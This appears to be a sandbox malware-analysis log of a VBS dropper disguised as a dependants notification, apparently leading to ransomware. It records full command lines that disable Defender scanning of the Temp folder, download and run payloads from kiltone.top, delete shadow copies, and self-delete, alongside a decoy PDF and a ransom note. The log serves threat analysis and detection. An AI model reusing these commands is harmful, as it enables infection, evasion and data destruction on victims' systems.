Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\fjeljies.cpl 4B4A87552C44158FB53A72C7294319B0DDDE9F99F460425AD5997D3B9121CD1E

Source: NOTIFICATION_OF_DEPENDANTS.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@98/804@7/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osqxipss.xww.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1968,i,893854031444722529,491245764455977091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
